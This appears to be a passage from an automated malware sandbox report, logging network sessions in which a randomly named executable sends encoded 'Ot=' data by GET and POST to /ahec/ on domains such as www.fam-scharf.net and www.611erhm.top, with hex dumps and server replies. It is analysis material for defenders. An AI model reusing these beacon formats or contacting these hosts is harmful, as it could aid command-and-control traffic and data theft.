63 41 50 63 52 52 6b 4c 77 43 77 70 55 69 56 32 4f 45 37 48 52 4d 51 39 6c 42 32 69 6f 2f 67 35 78 2f 48 70 36 74 34 39 34 65 4e 34 2f 5a 58 4b 31 51 66 65 6b 74 6c 39 4e 59 48 6f 2f 65 35 44 4d 44 64 74 34 79 62 6a 74 65 45 6a 6a 72 4c 5a 74 44 70 51 41 4d 73 62 4a 2f 39 63 64 65 69 65 6f 74 6c 42 67 6a 64 79 64 46 78 38 71 6f 63 30 71 76 52 48 43 55 77 47 65 31 71 48 77 65 32 58 33 7a 73 72 68 4b 49 65 41 78 30 74 4e 6b 41 50 49 4c 47 4d 63 76 4f 38 78 6e 4f 63 77 36 38 76 78 31 7a 63 56 78 53 6b 2f 44 70 30 51 49 77 7a 51 41 50 6a 4e 73 2b 5a 36 6a 4f 5a 38 49 4a 2b 73 5a 68 34 39 32 32 66 53 38 42 31 75 59 43 66 49 31 46 4d 48 7a 4d 42 4f 73 4f 69 4c 53 6c 38 42 69 78 57 5a 35 66 30 41 69 47 63 6e 42 2f 48 57 5a 2b 4c 70 72 48 4d 36 4c 44 55 69 77 56 50 38 52 4d 57 6e 32 43 38 77 43 74 50 39 53 79 6d 46 41 70 50 75 55 4e 46 7a 53 31 43 32 41 68 4f 6b 43 76 42 31 6b 45 41 42 6b 71 44 61 44 64 32 35 59 33 6c 5a 75 35 69 62 41 41 4d 58 52 66 4e 75 68 49 4d 45 4b 31 68 6c 46 49 4e 58 64 78 4e 53 46 33 70 48 59 72 32 32 4e 38 47 32 37 39 49 4b 67 54 55 52 4f 32 64 68 79 6d 4b 34 2b 6d 35 4d 77 35 4a 79 4e 61 2b 52 52 7a 6c 75 33 73 5a 72 44 77 51 49 44 66 57 36 75 48 6c 61 6d 4c 34 44 46 6d 59 32 67 65 67 6d 74 4c 30 34 74 6f 75 74 33 53 36 46 38 2b 52 74 6f 4e 69 50 4a 30 4a 47 69 34 69 47 56 4e 53 30 59 56 72 48 50 46 43 77 55 48 76 38 38 6c 6e 67 79 4b 6d 2b 68 68 50 63 4a 32 55 49 36
                                                                        Data Ascii: Ot=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKZlxJt6q4UjGrIO2XSsEXaSuU2jBHTzEVTJ4lPjh+WbeK/2Fuf3WvGsKh6McVzKvEpY1f39Yu/4qcFiXhM8AiiuOwSYmWZ79r694A/5xZ+21Zn940Qb0NhaiR6tiyI3cMBrx06ERj3Mca5+JBgG5bOMmmPWioE9RmOC/36zNuvePochT0UF6XcInCvK5yHMxz2SQ2TpbLTcVpinZXwYmw+XRmFVV4CL85EdK74fTgfes+LrCZhRoshuZS3ZVzd/z0v+14X6HENenzG8VrtUDcCryDpCRPbu4Iop90NIOoJXkiP4FoF/afIYQ/pLD866ID0N9zy+LK4yzXZvrYaO3kj7i0CT9DolTwMMe7IT4o3tm06Ca1A1ZtEtEMN3vKkbrM63KegckKaluVSD+4oklluC7Y0fhw+ZNMNSPeBjHgudQeWh6z9m52diDa5mQ4O0+A8saj1kHB1lGYgKDppSOK3S1cQFcJPPirk8pNJgfHHcundme19Dn004n3rIgEkyS+PHpKtj7Iyi3J2EWoxxppAPiLaRHmUprTS7TN+tDQcxjQTQ8RjeSZRpSgZtVSAyNxhR0AuS1CXHCK5FsjFwPL6XttbYGcmWjqqW5Mx67Wo/EYpZ6aJBZf3gs2KQYN0oKnPsuPf5FoMgc5SAKpxtCrsRin84rTTzLza72CqXlijJ6rRPEPMK1yaJy6T5i4cAPcRRkLwCwpUiV2OE7HRMQ9lB2io/g5x/Hp6t494eN4/ZXK1Qfektl9NYHo/e5DMDdt4ybjteEjjrLZtDpQAMsbJ/9cdeieotlBgjdydFx8qoc0qvRHCUwGe1qHwe2X3zsrhKIeAx0tNkAPILGMcvO8xnOcw68vx1zcVxSk/Dp0QIwzQAPjNs+Z6jOZ8IJ+sZh4922fS8B1uYCfI1FMHzMBOsOiLSl8BixWZ5f0AiGcnB/HWZ+LprHM6LDUiwVP8RMWn2C8wCtP9SymFApPuUNFzS1C2AhOkCvB1kEABkqDaDd25Y3lZu5ibAAMXRfNuhIMEK1hlFINXdxNSF3pHYr22N8G279IKgTURO2dhymK4+m5Mw5JyNa+RRzlu3sZrDwQIDfW6uHlamL4DFmY2gegmtL04tout3S6F8+RtoNiPJ0JGi4iGVNS0YVrHPFCwUHv88lngyKm+hhPcJ2UI6
                                                                        Dec 2, 2023 18:50:56.708125114 CET230INHTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:56.711246014 CET211INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.104974034.149.198.43805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:59.045965910 CET509OUTGET /ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.611erhm.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:59.332140923 CET354INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 5208
                                                                        Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                        Vary: Accept-Encoding
                                                                        ETag: "65267254-1458"
                                                                        Cache-Control: no-cache
                                                                        Accept-Ranges: bytes
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:59.345099926 CET1340INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                        Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                        Dec 2, 2023 18:50:59.345117092 CET1340INData Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65
                                                                        Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                        Dec 2, 2023 18:50:59.345129967 CET1340INData Raw: 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c
                                                                        Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                        Dec 2, 2023 18:50:59.345143080 CET1340INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74
                                                                        Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                        Dec 2, 2023 18:50:59.345155001 CET118INData Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.104974181.169.145.70805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:04.850024939 CET792OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.fam-scharf.net
                                                                        Origin: http://www.fam-scharf.net
                                                                        Referer: http://www.fam-scharf.net/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 55 62 62 59 39 72 31 46 58 65 48 2f 5a 37 4d 64 78 2b 33 55 61 48 51 37 6d 69 31 35 6f 54 61 6b 30 34 49 30 6f 74 65 63 42 52 53 73 75 61 4c 62 52 6f 54 68 76 54 6c 6a 53 36 48 5a 59 79 44 4a 54 47 35 79 37 58 52 74 46 57 56 43 53 49 65 30 45 6f 4a 76 62 79 44 51 6a 35 4c 6b 50 35 4c 72 74 36 57 42 71 44 41 5a 72 77 47 7a 64 61 75 79 72 58 37 37 4a 4d 48 30 4a 4e 4b 55 50 4d 49 37 5a 30 6d 62 6f 68 34 56 73 45 2b 77 33 35 4d 69 34 34 6c 54 35 74 4c 67 61 65 33 74 30 58 4c 7a 4d 75 70 6c 4e 77 3d 3d
                                                                        Data Ascii: Ot=kF7Vn6OF0YXrUbbY9r1FXeH/Z7Mdx+3UaHQ7mi15oTak04I0otecBRSsuaLbRoThvTljS6HZYyDJTG5y7XRtFWVCSIe0EoJvbyDQj5LkP5Lrt6WBqDAZrwGzdauyrX77JMH0JNKUPMI7Z0mboh4VsE+w35Mi44lT5tLgae3t0XLzMuplNw==
                                                                        Dec 2, 2023 18:51:05.052381992 CET428INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:04 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.104974281.169.145.70805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:08.962429047 CET812OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.fam-scharf.net
                                                                        Origin: http://www.fam-scharf.net
                                                                        Referer: http://www.fam-scharf.net/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 56 37 4c 59 75 62 4a 46 48 4f 48 38 48 72 4d 64 6a 2b 33 51 61 48 55 37 6d 68 35 50 72 68 4f 6b 30 5a 34 30 70 6f 79 63 47 52 53 73 67 36 4c 61 50 59 54 2f 76 54 70 72 53 36 37 5a 59 79 6e 4a 54 45 78 79 75 32 52 71 45 47 56 41 48 59 65 32 4b 49 4a 76 62 79 44 51 6a 35 65 42 50 35 54 72 74 75 71 42 71 69 41 61 33 67 47 38 61 61 75 79 34 48 37 2f 4a 4d 47 62 4a 4d 6d 2b 50 4f 67 37 5a 32 4f 62 70 7a 51 57 6c 45 2b 32 7a 35 4e 33 33 71 35 65 69 66 33 63 4b 4d 4c 2b 6c 6a 6a 6e 41 62 46 32 4b 46 52 62 74 63 4b 57 74 4f 54 53 41 50 66 73 68 53 76 70 73 74 4d 3d
                                                                        Data Ascii: Ot=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5PrhOk0Z40poycGRSsg6LaPYT/vTprS67ZYynJTExyu2RqEGVAHYe2KIJvbyDQj5eBP5TrtuqBqiAa3gG8aauy4H7/JMGbJMm+POg7Z2ObpzQWlE+2z5N33q5eif3cKML+ljjnAbF2KFRbtcKWtOTSAPfshSvpstM=
                                                                        Dec 2, 2023 18:51:09.168382883 CET428INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:09 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.104974381.169.145.70805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:11.698075056 CET1825OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.fam-scharf.net
                                                                        Origin: http://www.fam-scharf.net
                                                                        Referer: http://www.fam-scharf.net/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 56 37 4c 59 75 62 4a 46 48 4f 48 38 48 72 4d 64 6a 2b 33 51 61 48 55 37 6d 68 35 50 72 67 32 6b 31 72 77 30 6d 72 4b 63 48 52 53 73 6f 61 4c 48 50 59 53 36 76 54 78 76 53 36 33 4a 59 77 50 4a 53 68 6c 79 71 79 6c 71 4e 47 56 41 46 59 65 72 45 6f 49 33 62 7a 7a 55 6a 36 6d 42 50 35 54 72 74 76 36 42 6f 7a 41 61 6b 51 47 7a 64 61 75 32 72 58 37 58 4a 4d 66 73 4a 4d 6a 4c 50 2f 41 37 5a 57 65 62 71 47 6b 57 35 55 2b 30 30 35 4d 30 33 71 30 65 69 66 72 2b 4b 4d 2b 6a 6c 67 44 6e 41 71 34 4f 58 78 56 63 33 63 71 61 31 71 66 58 47 49 54 6c 39 6a 50 54 77 4e 72 76 42 6d 6c 53 67 2f 49 49 36 47 50 33 6d 32 63 2f 70 6b 34 37 67 63 54 52 34 6d 67 73 4b 56 51 57 4d 50 59 68 6a 4b 55 30 66 6e 6b 49 71 68 54 64 56 46 6e 50 63 71 7a 61 79 37 52 4f 31 39 48 43 52 2f 71 5a 36 31 71 51 58 33 66 67 7a 71 4d 68 36 36 32 4d 57 30 45 51 6c 65 59 61 2f 4b 32 38 44 58 73 79 61 42 5a 51 36 74 2b 74 72 55 73 71 56 32 4e 4d 4f 79 53 30 79 48 78 48 55 53 50 53 57 49 51 4b 37 6f 4f 59 77 79 78 31 71 6b 42 52 44 6a 72 41 74 55 4f 4d 42 78 62 72 42 4f 66 69 49 36 4b 75 4b 4a 6a 7a 43 76 58 77 43 56 50 33 47 72 6a 7a 53 76 49 6a 38 6d 44 69 5a 2b 2b 78 51 58 43 4d 57 4b 6f 4b 62 6d 65 35 4f 32 4b 69 70 42 4e 62 72 33 5a 6d 48 51 39 2b 77 56 79 45 6e 47 37 52 6b 45 52 34 35 71 68 56 76 5a 67 56 44 34 73 49 66 55 53 34 66 30 31 4c 4d 57 33 55 65 65 63 42 79 57 35 36 52 46 54 43 77 68 5a 33 46 74 74 65 35 71 7a 58 33 53 69 78 58 57 59 6b 61 54 63 66 32 74 59 59 51 70 4c 57 42 6d 78 7a 2f 6f 32 35 54 33 45 52 32 74 57 62 4e 6d 64 7a 4a 38 61 50 4a 64 61 5a 6f 56 49 72 68 53 61 63 68 76 56 43 4b 49 79 68 69 54 59 50 59 45 49 4a 61 65 5a 44 54 49 7a 7a 78 36 6d 39 67 37 74 70 79 4e 48 64 55 2f 53 79 4e 4a 6e 2f 63 34 51 6e 38 44 6c 37 2b 6d 69 39 33 6b 37 70 49 72 34 71 4d 32 42 33 43 75 52 36 44 79 54 6e 52 56 46 2b 6b 78 61 74 63 59 37 4c 64 52 31 70 44 4f 62 7a 65 34 31 4b 34 50 38 6c 41 77 37 2f 4f 66 31 39 59 65 72 4d 57 4e 7a 4a 4a 36 55 31 6d 4e 47 69 51 67 36 64 62 41 68 79 35 6d 62 54 32 6c 74 50 55 4a 67 76 41 6a 31 6f 4c 71 37 36 67 4e 56 57 72 69 6d 50 4f 30 34 31 6e 70 69 37 2b 44 7a 79 37 6f 51 65 4d 7a 59 39 64 38 39 62 6c 6c 64 58 45 45 6d 63 2b 55 34 6a 62 49 43 62 2f 66 46 41 6c 34 44 48 7a 5a 65 59 55 4c 30 58 62 56 49 55 6a 50 50 61 56 72 68 72 6e 4a 65 57 46 37 63 4c 6b 6b 4c 70 31 6d 4b 33 4a 7a 6d 57 39 6b 75 45 4f 33 57 75 51 69 6c 77 4e 36 42 41 38 77 31 37 75 79 34 74 62 75 36 53 75 45 68 48 61 54 31 67 75 38 64 6c 44 64 59 33 73 69 32 36 32 53 71 70 53 6d 78 48 31 4c 33 63 44 5a 79 37 68 74 4c 50 72 6d 48 54 75 38 2b 37 73 49 69 48 4b 5a 49 77 5a 63 33 63 32 31 71 30 66 7a 33 47 49 59 2b 46 7a 6d 6c 6d 37 53 6b 78 5a 55 36 37 63 31 33 6e 30 44 74 49 7a 54 62 6a 61 55 6d 36 31 52 6d 51 61 6a 79 49 52 45 7a 76 51 58 66 76 6b 66 2f 6e 6c 4e 64 7a 52 31 44 45 41 68 42 6a 74 4e 5a 2b 62 5a 6c 69 38 74 52 2b 43 30 55 76 4b 76 46 55 75 75 42 5a 77 73 56 47 43 4a 78 72 38 50 72 39 74 6d 59 6d 41 51 30 4c 6c 6d 4e 71 51 38 58 34 6a 67 66 33 73 69 58 79 4f 61 56 50 4c 41 46 51 6f 6a 6b 34 6e 63 73 7a 61 64 6b 2b 51 56 4e 7a 6f 61 36 65 49 34 4c 67 56 44 4a 44 57 77 6c 70 4f 76 67 2f 71 72 71 64 63 35 74 66 50 6b 4e 44 4a 78 65 35 41 31 56 4d 30 71 6c 59 2b 59 6e 6a 78 5a 64 45 56 58 61 53 78 59 52 62 37 6c 46 6d 4a 4b 38 76 6c 44 39 36 76 5a 63 62 61 35 51 31 73 64 48 46 4e 32 48 6f 45 63 68 34 78 47 72 41 46 41 49 43 67 68 63 64 57 63 55 6a 32 6d 35 41 61 62 2b 45 52 32 44 76 39 55 63 2b 65 66 50 2f 4f 7a 54 61 2f 55 38 73 69 58 2f 55 62 68 43 65 71 65 5a 32 57 67 75 72 37 65 46 4f 56 4e 4a 53 46 4e 44 6d 6d 4f 30 67 5a 59 6c 6e 73 31 51 30 71 37 2f 69
                                                                        Data Ascii: Ot=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5Prg2k1rw0mrKcHRSsoaLHPYS6vTxvS63JYwPJShlyqylqNGVAFYerEoI3bzzUj6mBP5Trtv6BozAakQGzdau2rX7XJMfsJMjLP/A7ZWebqGkW5U+005M03q0eifr+KM+jlgDnAq4OXxVc3cqa1qfXGITl9jPTwNrvBmlSg/II6GP3m2c/pk47gcTR4mgsKVQWMPYhjKU0fnkIqhTdVFnPcqzay7RO19HCR/qZ61qQX3fgzqMh662MW0EQleYa/K28DXsyaBZQ6t+trUsqV2NMOyS0yHxHUSPSWIQK7oOYwyx1qkBRDjrAtUOMBxbrBOfiI6KuKJjzCvXwCVP3GrjzSvIj8mDiZ++xQXCMWKoKbme5O2KipBNbr3ZmHQ9+wVyEnG7RkER45qhVvZgVD4sIfUS4f01LMW3UeecByW56RFTCwhZ3Ftte5qzX3SixXWYkaTcf2tYYQpLWBmxz/o25T3ER2tWbNmdzJ8aPJdaZoVIrhSachvVCKIyhiTYPYEIJaeZDTIzzx6m9g7tpyNHdU/SyNJn/c4Qn8Dl7+mi93k7pIr4qM2B3CuR6DyTnRVF+kxatcY7LdR1pDObze41K4P8lAw7/Of19YerMWNzJJ6U1mNGiQg6dbAhy5mbT2ltPUJgvAj1oLq76gNVWrimPO041npi7+Dzy7oQeMzY9d89blldXEEmc+U4jbICb/fFAl4DHzZeYUL0XbVIUjPPaVrhrnJeWF7cLkkLp1mK3JzmW9kuEO3WuQilwN6BA8w17uy4tbu6SuEhHaT1gu8dlDdY3si262SqpSmxH1L3cDZy7htLPrmHTu8+7sIiHKZIwZc3c21q0fz3GIY+Fzmlm7SkxZU67c13n0DtIzTbjaUm61RmQajyIREzvQXfvkf/nlNdzR1DEAhBjtNZ+bZli8tR+C0UvKvFUuuBZwsVGCJxr8Pr9tmYmAQ0LlmNqQ8X4jgf3siXyOaVPLAFQojk4ncszadk+QVNzoa6eI4LgVDJDWwlpOvg/qrqdc5tfPkNDJxe5A1VM0qlY+YnjxZdEVXaSxYRb7lFmJK8vlD96vZcba5Q1sdHFN2HoEch4xGrAFAICghcdWcUj2m5Aab+ER2Dv9Uc+efP/OzTa/U8siX/UbhCeqeZ2Wgur7eFOVNJSFNDmmO0gZYlns1Q0q7/i
                                                                        Dec 2, 2023 18:51:11.903847933 CET428INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:11 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.104974481.169.145.70805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:14.432070971 CET512OUTGET /ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.fam-scharf.net
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:14.637300014 CET428INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:14 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
